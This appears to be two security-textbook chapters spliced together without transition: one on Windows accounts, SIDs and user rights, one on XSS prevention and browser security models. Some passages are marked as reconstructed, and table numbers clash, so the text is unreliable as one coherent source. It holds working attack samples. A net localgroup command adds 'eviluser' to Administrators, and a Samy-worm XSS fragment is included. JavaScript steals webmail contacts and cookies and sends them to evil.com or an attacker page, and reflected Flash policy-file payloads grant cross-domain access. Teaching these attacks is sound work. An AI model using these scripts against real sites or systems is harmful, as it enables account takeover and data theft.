Windows can tell them apart, even if humans can’t. This feature can cause headaches for
the uninformed hacker.
Occasionally in this book, we will encounter situations where logging on as
Administrator fails. Here’s an example:
C:\>net use \\192.168.234.44\ipc$ password /u:Administrator
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
A hacker might be tempted to turn away at this point, without recalling that Windows
automatically passes the currently logged-on user’s credentials during network logon
attempts. Thus, if the user were currently logged on as Administrator on the client, this
logon attempt would be interpreted as an attempt to log on to the remote system using
the local Administrator account from the client. Of course, this account has no context on
the remote server. You can manually specify the logon context using the same net use
command with the remote domain, computer name, or IP address prepended to the
username with a backslash, like so:
C:\>net use \\192.168.234.44\ipc$ password /u:domain\Administrator
The command completed successfully.
Obviously, you should prepend the remote computer name or IP address if the
system to which you are connecting is not a member of a domain. Remembering this
little trick will come in handy when we discuss remote shells in Chapter 7; the technique
we use to spawn such remote shells often results in a shell running in the context of the
SYSTEM account. Credentials implicitly passed by net use commands executed within the LocalSystem context cannot
be interpreted by remote servers, so you almost always have to specify the domain or
computer name, as shown in the previous example.
Viewing SIDs with user2sid/sid2user
You can use the user2sid tool from Evgenii Rudnyi to extract SIDs. Here is user2sid being
run against the local machine:
C:\>user2sid \\caesars Administrator
S-1-5-21-1507001333-1204550764-1011284298-500
Number of subauthorities is 5
Domain is CORP
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
The sid2user tool performs the reverse operation, extracting a username given a SID.
Here’s an example using the SID extracted in the previous example:
C:\>sid2user \\caesars 5 21 1507001333 1204550764 1011284298 500
Name is Administrator
Domain is CORP
Type of SID is SidTypeUser
Note that the SID must be entered starting at the identifier authority number (which is
always 5 in the case of Windows Server 2003), and spaces are used to separate components,
rather than hyphens.
Users
Anyone with even a passing familiarity with Windows has encountered the concept of
user accounts. We use accounts to log on to the system and to access resources on the
system and the network. Few have considered what an account really represents,
however, which is one of the most common security failings on most networks.
Quite simply, an account is a reference context in which the operating system executes
code. Put another way, all user mode code executes in the context of a user account. Even some
code that runs automatically before anyone logs on (such as services) runs in the context
of an account (often as the special and all-powerful SYSTEM, or LocalSystem, account).
All commands invoked by the user who successfully authenticates using the account
credentials are run with the privileges of that user. Thus, the actions performed by
executing code are limited only by the privileges granted to the account that executes it.
The goal of the malicious hacker is to run code with the highest possible privileges. Thus,
the hacker must “become” the account with the highest possible privileges.
Built-ins
Windows comes out of the box with built-in accounts that have predefined privileges.
These default accounts include the local Administrator account, which is the most
powerful user account in Windows. (Actually, the SYSTEM account is technically the
most privileged, but Administrator can execute commands as SYSTEM quite readily
using the Scheduler Service to launch a command shell, for example.) Table 2-1 lists the
default built-in accounts on various versions of Windows.
Note a few caveats about Table 2-1:
• On domain controllers, some security principals are not visible in the default
Active Directory Users and Computers interface unless you choose View |
Advanced Features.
• Versions of Windows including XP and later “hide” the local Administrator
account by default, but it’s still there.
• Some of the accounts listed in Table 2-1 are not created unless specific server
roles have been configured; for example, Application Server (IIS).
• The Guests group and the user accounts Guest and Support_388945a0 are assigned
unique SIDs corresponding to the domains in which they reside.
Service Accounts
Service account is an unofficial term used to describe a Windows user account that
launches and runs a service non-interactively (a more traditional computing term is batch
accounts). Service accounts are typically not used by human beings for interactive logon,
but are used to start up and run automated routines that provide certain functionality to
the operating system on a continuous basis. For example, the Indexing service, which
indexes contents and properties of files on local and remote computers, and is located in
%systemroot%\System32\cisvc.exe, can be configured to start up at boot time using the
Services control panel. For this executable to run, it must authenticate to the operating
system. For example, the Indexing service authenticates and runs as the LocalSystem
account on Windows Server 2003 in its out-of-the-box configuration.
Service accounts are a necessary evil in Windows. Because all code must execute in
the context of an account, they can’t be avoided. Unfortunately, because they are
designed to authenticate in an automated fashion, the passwords for these accounts
must be provided to the system without human interaction. In fact, Microsoft designed
the Windows NT family to cache passwords for service accounts on the local system.
This was done for the simple convenience that many services need to start up before the
network is available (at boot time), and thus could not be authenticated to domain
controllers. By caching the passwords locally, this situation is avoided. Here’s the
kicker:
Non-SYSTEM service account passwords are stored in cleartext in a portion of the Registry
called the LSA Secrets, which is accessible only to LocalSystem.
We highlighted this sentence because it leads to one of the major security failings of the
Windows OS: If a malicious hacker can compromise a Windows NT family system with
Administrator-equivalent privileges, he or she can extract the cleartext passwords for
service accounts on that machine.
“Yippee,” you might be saying, if you’re already Administrator-equivalent on the
machine; “What additional use are the service accounts?” Here’s where things get
sticky: Service accounts can be domain accounts or even accounts from other trusted
domains. (See the section “Trusts” later in this chapter.) Thus, credentials from other
security domains can be exposed via this flaw.
Service Hardening
Services represent a large percentage of the overall attack surface in
Windows because they are generally always on and run at high privilege. Largely because
of this, Microsoft began taking steps to reduce the risk from running services in more
recent versions of the OS.
One of the first steps was to run services with least privilege, a long-accepted access
control principle. Beginning in Windows Server 2003, Microsoft created two new built-in
groups called Local Service and Network Service, and started running more services
using those lower privileged accounts rather than the all-powerful LocalSystem account.
(We’ll talk more about Local and Network Service throughout this chapter.)
In Vista, Microsoft implemented Windows Service Hardening, which defined per-
service SIDs. This effectively made certain services behave like unique users (again, as
opposed to the generic and highly privileged LocalSystem identity). Default Windows
access control settings could now be applied to resources in order to make them private
to the service, preventing other services and users from accessing the resource.
Additional features included within Service Hardening in Vista include removal of
unnecessary Windows privileges (such as the powerful debugging privilege), applying
a write-restricted access token to the service process to prevent writing to resources
that do not explicitly grant access to the Service SID, and linking Windows firewall
policy to the per-service SID to prevent unauthorized network access by the service.
For more information about Service Hardening, see “References and Further
Reading.”
The Bottom Line
Here’s a summary of Windows accounts from the malicious hacker’s perspective:
Administrators and the SYSTEM account are the juiciest targets on a Windows system
because they are the most powerful accounts. All other accounts have limited privileges
relative to Administrators and SYSTEM (one possible exception being service accounts).
Compromise of Administrators or the SYSTEM account is thus almost always the
ultimate goal of an attacker.
Groups
Groups are primarily an administrative convenience—they are logical containers for
aggregating user accounts. (They can also be used to set up e-mail distribution lists in
Windows 2000 and later, which historically have had no security implications.)
Groups are also used to allocate privileges in bulk, which can have a heavy impact on
the security of a system. Windows in its various flavors comes with built-in groups,
predefined containers for users that also possess varying levels of privilege. Any account
placed within a group inherits those privileges. The simplest example of this is the
addition of accounts to the local Administrators group, which essentially promotes the
added user to all-powerful status on the local machine. (You’ll see this attempted many
times throughout this book.) Table 2-2 lists built-in groups in Windows Server 2003.
Other versions of Windows may have fewer or different built-in groups, but those listed
in Table 2-2 are the most common.
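For example, the promotion described above takes a single command from an elevated prompt (the account name is hypothetical):

C:\>net localgroup Administrators eviluser /add
The command completed successfully.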
To summarize Windows groups from the malicious hacker’s perspective:
Members of the local Administrators group are the juiciest targets on a Windows system
because members of this group inherit complete control of the local system. Domain
Admins and Enterprise Admins are the juiciest targets on a Windows domain because
members of those groups are all-powerful on every (properly configured) machine in
the domain. All other groups possess very limited privileges relative to Administrators,
Domain Admins, or Enterprise Admins. Becoming a local Administrator, Domain Admin,
or Enterprise Admin (whether via directly compromising an existing account or by
adding an already-compromised account to one of those groups) is thus almost always
the ultimate goal of an attacker.
Special Identities
In addition to built-in groups, Windows has several special identities (sometimes called
well-known groups), which are containers for accounts that transitively pass through
certain states (such as being logged on via the network) or from certain places (such as
interactively at the keyboard). These identities can be used to fine tune access control to
resources. For example, access to certain processes may be reserved for INTERACTIVE
users only (and thus blocked for all users authenticated via the network). These well-
known groups belong to the NT AUTHORITY “domain,” so to refer to their fully
qualified name, you would say NT AUTHORITY\INTERACTIVE, for example. Table 2-4 lists
the Windows special identities.
Some key points worth noting about these special identities:
The Anonymous Logon group can be leveraged to gain a foothold on a Windows
system without authenticating. Also, the INTERACTIVE identity is required in many
instances to execute privilege escalation attacks against Windows (see Chapter 7).
Restricted Groups
A pretty nifty concept that was introduced with Windows 2000, Restricted Groups allows
an administrator to set a domain policy that restricts the membership of a given group.
For example, if an unauthorized user adds himself to the local Administrators group on
a domain member, upon the next Group Policy refresh, that account will be removed so
that membership reflects that which is defined by the Restricted Groups policy. These
settings are refreshed every 90 minutes on a member computer, every 5 minutes on a
domain controller, and every 16 hours whether or not changes have occurred.
Computers (Machine Accounts)
When a Windows system joins a domain, a computer account is created. Computer
accounts are essentially user accounts that are used by machines to log on and access
resources (thus, computers are also called machine accounts). This account name appends
a dollar sign ($) to the name of the machine (machinename$).
As you might imagine, to log on to a domain, computer accounts require passwords.
Computer passwords are automatically generated and managed by domain controllers.
(See the upcoming section “Forests, Trees, and Domains.”) Computer passwords are
otherwise stored and accessed just like any other user account password. (See the
upcoming section “The SAM and Active Directory.”) By default, they are reset every 30
days, but administrators can configure a different interval if they want.
The primary use for computer accounts is to create a secure channel between the
computer and the domain controller for purposes of exchanging information. By default,
this secure channel is not encrypted (although some of the information that passes through
it is already encrypted, such as password hashes), and its integrity is not checked (thus
making it vulnerable to spoofing or man-in-the-middle attacks). For example, when a
user logs on to a domain from a domain member computer, the logon exchange occurs
over the secure channel negotiated between the member and the domain controller.
We’ve never heard of a case where exploitation of a machine account has resulted in
a serious exposure, so we will not discuss this much in this book.
User Rights
Recall the main goal of the attacker from the beginning of this chapter:
To execute commands in the most privileged context, in order to gain access to resources
and data.
We’ve just described some of the “most privileged” user mode account contexts, such
as Administrator and LocalSystem. What makes these accounts so powerful? In a word
(two words, actually), user rights. User rights are a finite set of basic capabilities, such as
logging on locally or debugging programs. They are used in the access control model in
addition to the standard comparing of access token SIDs to security descriptors. User
rights are typically assigned to groups, since this makes them easier to manage than
constantly assigning them to individual users. This is why membership in groups is so
important—because the group is typically the unit of privilege assignment.
Two types of user rights can be granted: logon rights and privileges. This is simply a
semantic classification to differentiate rights that apply before an account is authenticated
and after, respectively. More than 40 discrete user rights are available in Windows Server
2008 (code name Longhorn), and although each can heavily impact security, we discuss
only those that have traditionally had a large security impact. Table 2-5 outlines some of
the privileges we consider critical, along with our recommended configurations.
Note that the “deny” rights supersede their corresponding “allow” rights if an
account is subject to both policies.
Some user rights relevant to security were implemented in Windows Server 2003,
including the following:
• Allow logon through Terminal Services
• Deny logon through Terminal Services
• Impersonate a client after authentication
• Perform volume maintenance tasks
The Terminal Services–related rights were implemented to address a gap in the
“Allow/deny access to this computer from the network” rights, which do not apply to
Terminal Services. The “Impersonate a client after authentication” right was added to
help mitigate privilege escalation attacks in which lower privileged services impersonated
higher privileged clients.
Last but not least in our discussion of user rights is a reminder always to use the
principle of least privilege. We see too many people logging on as Administrator-
equivalent accounts to perform daily work. By taking the time up front to consider the
appropriate user rights, most of the significant security vulnerabilities discussed in this
book can be alleviated. Log on as a lesser privileged user, and use the runas tool to escalate privileges when necessary.
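For example, from a lesser privileged session, the following opens a command shell in the local Administrator's context after prompting for the password:

C:\>runas /user:Administrator cmd.exe
Enter the password for Administrator: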


Preventing Cross-Site Scripting

To prevent XSS, developers must be very careful of user-supplied data that is served
back to users. We define user-supplied data as any data that comes from an outside network
connection to some web application. It could be a username submitted in an HTML form
at login, a backend AJAX request that was supposed to come from the JavaScript code
the developer programmed, an e-mail, or even HTTP headers. Treat all data entering a
web application from an outside network connection as potentially harmful.
For all user-supplied data that is later redisplayed back to users in all HTTP responses
such as web pages and AJAX responses (HTTP response code 200), page not found errors
(HTTP response code 404), server errors (like HTTP response code 502), redirects (like
HTTP response code 302), and so on, the developer must do one of the following:
• Escape the data properly so it is not interpreted as HTML (to browsers) or XML
(to Flash).
• Remove characters or strings that can be used maliciously.
Removing characters generally affects user experience. For instance, if the developer
removed apostrophes (’), some people with the last name O’Reilly, or the like, would be
frustrated that their last name is not displayed properly.
We strongly discourage developers from removing strings, because strings can be
represented in many ways and are interpreted differently by different applications and
browsers. For example, the SAMY worm took advantage of the fact that IE does not
consider new lines to be word delimiters. Thus, IE interprets javascript and
jav%0dascr%0dipt (where %0d is a URL-encoded carriage return) as the same string.
Unfortunately, MySpace interpreted new lines as delimiting words and allowed the
following to be placed on Samy’s (and others’) MySpace pages:
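(A representative fragment, reconstructed from public write-ups of the worm; the actual payload was much longer, and the element names are as reported there.)

<div id="mycode" expr="alert('XSS')" style="background:url('java
script:eval(document.all.mycode.expr)')">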
We recommend escaping all user-supplied data that is sent back to a web browser within
AJAX calls, mobile applications, web pages, redirects, and so on. However, escaping
strings is not simple; you must escape with URL encoding, HTML entity encoding, or
JavaScript encoding, depending on where the user-supplied data is placed in the HTTP
response.
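For instance, here is a minimal sketch of HTML entity encoding for user-supplied data placed in ordinary HTML content (the function name is illustrative; data placed in URLs or scripts needs the other encodings named above, and production code should use a vetted encoding library):

function htmlEscape(s) {
    // Replace the characters that let data break out of an HTML context.
    return String(s)
        .replace(/&/g, "&amp;")
        .replace(/</g, "&lt;")
        .replace(/>/g, "&gt;")
        .replace(/"/g, "&quot;")
        .replace(/'/g, "&#x27;");
}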

WEB BROWSER SECURITY MODELS

A variety of security controls are placed in web browsers. The key to hacking web
applications is to find a problem in one of the browser security controls or circumvent
one of the controls. Each security control attempts to be independent from the others, but
if an attacker can inject a little JavaScript in the wrong place, all the security controls
break down and only the weakest control remains—the same origin policy.
The same origin policy generally rules all security controls. However, frequent flaws
in web browsers and in browser plug-ins, such as Acrobat Reader, Flash, and Outlook
Express, have compromised even the same origin policy.
In this chapter, we discuss three browser security models as they were intended to be:
• The same origin policy
• The cookies security model
• The Flash security model
We also discuss how to use a little JavaScript to weaken some of the models.
Same Origin/Domain Policy
The same origin policy (also known as same domain policy) is the main security control
in web browsers. An origin is defined as the combination of host name, protocol, and port
number; you can think of an origin as the entity that created some web page or information
being accessed by a browser. The same origin policy simply requires that dynamic
content (for example, JavaScript or VBScript) can read only those HTTP responses and
cookies that come from the same origin as the content itself; it may not read content
from a different origin. Interestingly, the same origin policy does not impose any write
access control. As such, web sites can send (or write) HTTP requests to any other web
site, although browsers may restrict the cookies and headers associated with such
cross-site requests.
The same origin policy may best be explained through examples. Suppose I have a
web page at http://foo.com/bar/baz.html with JavaScript in it. That JavaScript can
read/write some pages and not others. Table 2-1 outlines what URLs the JavaScript from
http://foo.com/bar/baz.html can access.
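In brief, the comparisons come down to host, protocol, and port; an illustrative summary:

// Script running in a page from http://foo.com/bar/baz.html can read:
//   http://foo.com/bar/other.html     yes (same host, protocol, and port)
//   http://foo.com/qux/page.html      yes (the path does not matter)
//   https://foo.com/bar/baz.html      no  (different protocol)
//   http://foo.com:8080/bar/baz.html  no  (different port)
//   http://www.foo.com/bar/baz.html   no  (different host)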
Exceptions to the Same Origin Policy
Browsers can be instructed to allow limited exceptions to the same origin policy
by setting JavaScript’s document.domain variable on the requested page. Namely, if
http://www.foo.com/bar/baz.html set document.domain = "foo.com" in its page,
then http://xyz.foo.com/anywhere.html (after likewise setting its document.domain to
"foo.com") could send an HTTP request to http://www.foo.com/bar/baz.html and read its contents.
In this case, if an attacker can inject HTML or JavaScript in http://xyz.foo.com/
anywhere.html, the attacker can inject JavaScript in http://www.foo.com/bar/baz.html,
too. This is done by the attacker first injecting HTML and JavaScript into http://xyz
.foo.com/anywhere.html that sets the document.domain to foo.com, then loads an
iframe to http://www.foo.com/bar/baz.html that also contains a document.domain set
to foo.com, and then accesses the iframe contents via JavaScript. For example, the
following code in http://xyz.foo.com/anywhere.html will execute a JavaScript alert()
box in the www.foo.com domain:
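A minimal sketch of such code, assuming http://www.foo.com/bar/baz.html also sets its document.domain to "foo.com" (the element ID is illustrative):

<script>
    // Relax this page's origin to the shared parent domain.
    document.domain = "foo.com";
    function runInTarget() {
        // Accessible only because both pages set document.domain = "foo.com".
        var frameDoc = document.getElementById("target").contentWindow.document;
        // Inject a script into the framed page so the alert() runs
        // in the www.foo.com domain.
        var s = frameDoc.createElement("script");
        s.text = "alert(document.domain);";
        frameDoc.body.appendChild(s);
    }
</script>
<iframe id="target" src="http://www.foo.com/bar/baz.html"
        onload="runInTarget()"></iframe>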
Thus, document.domain allows an attacker to traverse domains.
In Firefox and Mozilla browsers, attackers can manipulate document.domain with
__defineGetter__() so that document.domain returns any string of the attacker’s
choice. This does not affect the browser’s same origin policy as it affects only the
JavaScript engine and not the underlying Document Object Model (DOM), but it could
affect JavaScript applications that rely on document.domain for backend cross-domain
requests. For example, suppose that a backend request to
http://somesite.com/GetInformation?callback=callbackFunction responded with the
following HTTP body:
function callbackFunction() {
    if (document.domain == "safesite.com") {
        return "Confidential Information";
    }
    return "Unauthorized";
}
An attacker could get the confidential information by luring a victim to the attacker’s
page that contained this script:
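A minimal sketch of such a page (the exfiltration endpoint is illustrative; __defineGetter__() behaved this way in Mozilla-based browsers of the era):

<script>
    // Make document.domain return the attacker's chosen string.
    document.__defineGetter__("domain",
        function() { return "safesite.com"; });
    function sendInfoToEvilSite(info) {
        // Exfiltrate via an image request.
        new Image().src = "http://www.evil.com/log?info=" +
            encodeURIComponent(info);
    }
</script>
<!-- The cross-domain request: the response body defines callbackFunction(). -->
<script src="http://somesite.com/GetInformation?callback=callbackFunction"></script>
<script>
    // Wait 1.5 seconds for the request to finish, then steal the data.
    setTimeout(function() {
        sendInfoToEvilSite(callbackFunction());
    }, 1500);
</script>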
This HTML code sets document.domain via __defineGetter__() and makes a
cross-domain request to http://somesite.com/GetInformation?callback=callbackFunction.
Finally, it calls sendInfoToEvilSite(callbackFunction()) after 1.5 seconds, a
generous amount of time for the browser to complete the request to somesite.com.
Therefore, you should not rely on document.domain for security checks like this one.
What Happens if the Same Origin Policy Is Broken?
The same origin policy ensures that an “evil” web site cannot access other web sites, but
what if the same origin policy was broken or not there at all? What could an attacker do?
Let’s consider one hypothetical example.
Suppose that an attacker made a web page at http://www.evil.com/index.html that
could read HTTP responses from another domain, such as a webmail application, and the
attacker was able to lure the webmail users to http://www.evil.com/index.html. Then
the attacker would be able to read the contacts of the lured users. This would be done
with the following JavaScript in http://www.evil.com/index.html:
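A minimal sketch of such a page, following the numbered steps described below (the form name and collection endpoint are illustrative):

<html>
<body>
All your contacts are belong to us. :)
<!-- Step 1: load the victim's contact list in a hidden iframe. -->
<iframe name="WebmailIframe" style="display:none"
        src="http://webmail.foo.com/ViewContacts"></iframe>
<form name="evilForm" action="http://www.evil.com/collect" method="post">
    <input type="hidden" name="contacts" value="">
</form>
<script>
    // Step 2: wait one second so the contact list can finish loading.
    setTimeout(doEvil, 1000);
    function doEvil() {
        // Step 3: read the iframe's contents; this succeeds only if the
        // same origin policy is broken or absent.
        var victimsContactList =
            window.frames["WebmailIframe"].document.body.innerHTML;
        // Ship the stolen data to evil.com using the form in this page.
        document.evilForm.contacts.value = victimsContactList;
        document.evilForm.submit();
    }
</script>
</body>
</html>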
Step 1 uses an iframe named WebmailIframe to load http://webmail.foo.com/
ViewContacts, which is a call in the webmail application to gather the user’s contact list.
Step 2 waits 1 second and then runs the JavaScript function doEvil(). The delay ensures
that the contact list was loaded in the iframe. After some assurance that the contact list
has been loaded in the iframe, doEvil() attempts to access the data from the iframe in
Step 3. If the same origin policy was broken or did not exist, the attacker would have the
victim’s contact list in the variable victimsContactList. The attacker could send the
contact list to the evil.com server using JavaScript and the form in the page.
The attacker could make matters worse by using cross-site request forgery (CSRF) to
send e-mails on behalf of the victimized user to all of his or her contacts. These contacts
would receive a seemingly legitimate e-mail that appeared to be sent from their friend,
asking them to click http://www.evil.com/index.html.
Note that if the same origin policy were broken, then every web application would be
vulnerable to attack—not just webmail applications. No security would exist on the web.
A lot of research has been focused on breaking the same origin policy. And once in a
while, some pretty astonishing findings result.
Cookie Security Model
HTTP is a stateless protocol, meaning that one HTTP request/response pair has no
association with any other HTTP request/response pair. At some point in the evolution
of HTTP, developers wanted to maintain some data throughout every request/response
so that they could make richer web applications. RFC 2109 created a standard whereby
every HTTP request automatically sends the same data from the user to the server in an
HTTP header called a cookie. Both the web page and server have read/write control of
this data. A typical cookie accessed through JavaScript’s document.cookie looks like
this:
CookieName1=CookieValue1; CookieName2=CookieValue2;
Cookies were intended to store confidential information, such as authentication
credentials, so RFC 2109 defined security guidelines similar to those of the same domain
policy.
Servers are intended to be the main controller of cookies. Servers can read cookies,
write cookies, and set security controls on the cookies. The cookie security controls
include the following:
• domain This attribute is intended to act similarly to the same origin policy but
is a little more restrictive. Like the same origin policy, the domain defaults to the
domain in the HTTP request Host header, but the domain can be set up to one
domain level higher. For example, if the HTTP request was to x.y.z.com, then
x.y.z.com could set cookies for all of *.y.z.com, but it cannot set cookies for all
of *.z.com. Naturally, no domain may set cookies for top-level domains (TLDs)
such as *.com.
• path This attribute was intended to refine the domain security model to
include the URL path. The path attribute is optional. If set, the cookie is sent
only with requests whose URL path falls under the path attribute. For example,
say http://x.y.z.com/a/WebApp set a cookie with path /a; then the cookie would
be sent with requests to http://x.y.z.com/a/* only, including deeper paths such as
http://x.y.z.com/a/b/index.html. The cookie would not be sent to
http://x.y.z.com/index.html.
• secure If a cookie has this attribute set, the cookie is sent only with HTTPS
requests. Note that both HTTP and HTTPS responses can set the secure
attribute; thus, a plain HTTP response can alter a secure cookie that was set over
HTTPS. This weakness is exploited by some advanced man-in-the-middle attacks.
• expires Usually, cookies are deleted when the browser closes. However, you
can set a date in the Wdy, DD-Mon-YYYY HH:MM:SS GMT format to store the
cookies on the user’s computer and keep sending the cookie on every HTTP
request until the expiry date. You can delete cookies immediately by setting the
expires attribute to a past date.
• HttpOnly This attribute is now respected by both Firefox and Internet Explorer,
but it has historically been little used in web applications because it was originally
available only in Internet Explorer. If this attribute is set, the browser disallows the
cookie from being read or written via JavaScript’s document.cookie. This is intended
to prevent an attacker from stealing cookies and doing something bad with them.
However, an attacker who can run JavaScript could still perform equally bad actions
without stealing cookies.
Security attributes are concatenated to the cookies like this:
CookieName1=CookieValue1; domain=.y.z.com; path=/a;
CookieName2=CookieValue2; domain=x.y.z.com; secure
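On the wire, a server sets the same cookies and attributes with one Set-Cookie response header per cookie; for example (values are illustrative):

Set-Cookie: CookieName1=CookieValue1; domain=.y.z.com; path=/a
Set-Cookie: CookieName2=CookieValue2; domain=x.y.z.com; secure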
JavaScript and VBScript are effectively treated as extensions of the server’s code, so
these scripting languages can read and write cookies by accessing the document.cookie
variable, unless the cookie has the HttpOnly attribute set and the browser honors it. This
is of great interest to hackers, because cookies generally contain authentication credentials,
CSRF protection information, and other confidential information. Also, man-in-the-middle
(MitM) attackers can edit any JavaScript delivered over plain HTTP.
If an attacker can break or circumvent the same origin policy, cookies can be
easily read via the DOM through the document.cookie variable. Writing new cookies is
easy, too: simply assign a string in the following format to document.cookie (the setter
appends a cookie rather than overwriting the whole cookie string):
var cookieDate = new Date(2030, 11, 31); // months are 0-indexed: 11 = December
document.cookie = "CookieName=CookieValue;" +
    /* All lines below are optional. */
    "domain=.y.z.com;" +
    "path=/a;" +
    "expires=" + cookieDate.toGMTString() + ";" +
    "secure;";
// Note: HttpOnly cannot be set from script; browsers ignore it in document.cookie.
Problems with Setting and Parsing Cookies
Cookies are used by JavaScript, web browsers, web servers, load balancers, and other
independent systems. Each system uses different code to parse cookies. Undoubtedly,
these systems will parse (and read) cookies differently. Attackers may be able to add or
replace a cookie in a victim’s cookies that will appear different to systems that expect the
cookie to look the same. For instance, an attacker may be able to add or overwrite a cookie
that uses the same name as a cookie that already exists in the victim’s cookies. Consider
a university setting, where an attacker has a public web page at http://public-pages.
university.edu/~attacker and the university hosts a webmail service at https://webmail
.university.edu/. The attacker can set a cookie in the .university.edu domain that will
be sent to https://webmail.university.edu/. Suppose that cookie is named the same as
the webmail authentication cookie. The webmail system will now read the attacker’s
cookie.
The webmail system may assume the user is someone different and log him or her in to
a different webmail account. The attacker could then set up the different webmail account
(possibly his own account) to contain a single e-mail stating that the user’s e-mails were
removed due to a “security breach” and that the user must go to http://public-pages.
university.edu/~attacker/reAuthenticate (or a less obviously malicious link) to sign in
again and to see all his or her e-mail. The attacker could make the reAuthenticate link look
like a typical university sign-in page, asking for the victim’s username and password. When
the victim submits the information, the username and password would be sent to the
attacker. This type of attack is sometimes referred to as a session fixation attack, where the
attacker fixates the user to a session of the attacker’s choice.
Injecting only cookie fragments may also make different systems read cookies differently.
Note that cookies and their security attributes are separated by the same character, a
semicolon (;). If an attacker can add cookies via JavaScript, or if cookies are set based
on some user input, then the attacker could inject a cookie fragment that changes the
security attributes or values of other cookies.
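For example, suppose a server echoes a user-supplied language parameter into a cookie value without filtering semicolons (the parameter and cookie names are hypothetical). A submitted value of

en; domain=.university.edu

turns the intended header

Set-Cookie: lang=en; path=/

into

Set-Cookie: lang=en; domain=.university.edu; path=/

which silently widens the cookie’s scope to the entire university.edu domain.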
Protecting Against Cookie Parsing Attacks
Test for these types of attacks. Assume that man-in-the-middle attacks will be able to
overwrite even cookies that are set secure and sent over Secure Sockets Layer (SSL).
Thus, check the integrity of cookies by cross-referencing them to some session state. If
the cookie has been tampered with, make the request fail.
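One way to implement such an integrity check is to bind each cookie value to a server-side secret; a minimal sketch in Node.js-style JavaScript (using the standard crypto module; all names are illustrative):

var crypto = require("crypto");
var SECRET = "keep-this-secret-on-the-server"; // illustrative

// Append an HMAC so tampering, even by a MitM rewriting the cookie,
// is detectable on the next request.
function signCookieValue(value) {
    var mac = crypto.createHmac("sha256", SECRET)
                    .update(value).digest("hex");
    return value + "." + mac;
}

// Returns the original value, or null if the cookie fails the check;
// on null, the application should make the request fail.
function verifyCookieValue(signed) {
    var dot = signed.lastIndexOf(".");
    if (dot < 0) return null;
    var value = signed.slice(0, dot);
    return signCookieValue(value) === signed ? value : null;
}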
Using JavaScript to Reduce the Cookie Security Model
to the Same Origin Policy
The cookie security model is intended to be more secure than the same origin policy,
but with some JavaScript, the cookie domain is reduced to the security of the same origin
policy’s document.domain setting, and the cookie path attribute can be completely
circumvented.
We’ll use the university webmail example again where an attacker creates a web
page at http://public-pages.university.edu/~attacker/ and the university has a webmail
system at http://webmail.university.edu/. If a single page in http://webmail.university
.edu/ has document.domain="university.edu" (call the page http://webmail
.university.edu/badPage.html), then the attacker could steal the victim’s cookies by
luring him or her to http://public-pages.university.edu/~attacker/stealCookies.htm,
which contains the following code:
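A minimal sketch of stealCookies.htm, assuming badPage.html sets document.domain as described (the frame name and logging endpoint are illustrative):

<script>
    // Relax this page's origin to match badPage.html.
    document.domain = "university.edu";
    function stealCookies() {
        // Readable because badPage.html also set its document.domain;
        // this exposes every cookie visible to that page, regardless of
        // the cookies' domain and path attributes.
        var cookies = window.frames["mailFrame"].document.cookie;
        new Image().src =
            "http://public-pages.university.edu/~attacker/log?c=" +
            encodeURIComponent(cookies);
    }
</script>
<iframe name="mailFrame" style="display:none"
        src="http://webmail.university.edu/badPage.html"
        onload="stealCookies()"></iframe>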
Protecting Cookies
Use the added features in the cookie security model, but do not rely on them for
security. Simply trust the same origin policy and design your web application’s
security around the same origin policy.
Flash Security Model
Flash is a popular plug-in for most web browsers. Recent versions of Flash have very
complicated security models that can be customized to the developer’s preference. We
describe some interesting aspects of Flash’s security model here. However, first we
briefly describe some interesting features of Flash that JavaScript does not possess.
Flash’s scripting language is called ActionScript. ActionScript is similar to JavaScript
and includes some interesting classes from an attacker’s perspective:
• The class Socket allows the developer to create raw TCP socket connections
to allowed domains, for purposes such as crafting complete HTTP requests
with spoofed headers such as Referer. Also, Socket can be used to scan
computers and ports on the local network that are not accessible externally.
• The class ExternalInterface allows the developer to run JavaScript in
the browser from Flash, for purposes such as reading from and writing to
document.cookie.
• The classes XML and URLLoader perform HTTP requests (with the browser
cookies) on behalf of the user to allowed domains, for purposes such as cross-
domain requests.
By default, the security model for Flash is similar to that of the same origin policy.
Namely, Flash can read responses from requests only from the same domain from which
the Flash application originated. Flash also places some security around making HTTP
requests, but you can make cross-domain GET requests via Flash’s getURL function.
Also, Flash does not allow Flash applications that are loaded over HTTP to read HTTPS
responses.
Flash does allow cross-domain communication, if a security policy on the other
domain permits communication with the domain where the Flash application resides.
The security policy is an XML file usually named crossdomain.xml and usually located
in the root directory of the other domain. The worst policy file from a security perspective
looks something like this:
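<?xml version="1.0"?>
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-policy>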
This policy allows any Flash application to communicate (cross-domain) with the
server hosting this crossdomain.xml file.
The policy file can have any name and be located in any directory. An arbitrary
security policy file is loaded with the following ActionScript code:
System.security.loadPolicyFile("http://public-" +
    "pages.university.edu/crossdomain.xml");
If it is not in the server’s root directory, the policy applies only to the directory in
which the policy file is located, plus all subdirectories within that directory. For instance,
suppose a policy file was located in http://public-pages.university.edu/~attacker/
crossdomain.xml. Then the policy would apply to requests such as http://public-
pages.university.edu/~attacker/doEvil.html and http://public-pages.university.edu
/~attacker/moreEvil/doMoreEvil.html, but not to pages such as http://public-pages
.university.edu/~someStudent/familyPictures.html or http://public-pages.university
.edu/index.html.
Policy files are forgivingly parsed by Flash, so if you can construct an HTTP request
that results in the server sending back a policy file, Flash will accept the policy file. For
instance, suppose some AJAX request to
http://www.university.edu/CourseListing?format=js&callback=<cross-domain-policy><allow-access-from%20domain="*"/></cross-domain-policy>
responded with the following:
<cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>() { return {name:"English101",
desc:"Read Books"}, {name:"Computers101",
desc:"play on computers"}};
Then you could load this policy via the ActionScript:
System.security.loadPolicyFile("http://www.university.edu/" +
    "CourseListing?format=js&callback=" +
    "<cross-domain-policy>" +
    "<allow-access-from%20domain=\"*\"/>" +
    "</cross-domain-policy>");
This results in the Flash application having complete cross-domain access to http://
www.university.edu/.
Many people have identified that if they can upload a file to a server containing an
insecure policy file that could later be retrieved over HTTP, then System.security
.loadPolicyFile() would also respect that policy file. Stefan Esser of www.hardened-
php.net showed that placing an insecure policy file in a GIF image also works. (See
“References and Further Reading” at the end of the chapter for more information.)
In general, it appears that Flash will respect any file containing the cross-domain
policy unless unclosed tags or extended ASCII characters appear before the opening
<cross-domain-policy> tag. Note that the MIME type is completely ignored by the Flash Player.
Protecting Against Reflected Policy Files
When sending user-definable data back to the user, you should HTML entity escape the
greater-than (>) and less-than (<) characters to &gt; and &lt;, respectively, or simply
remove those characters.
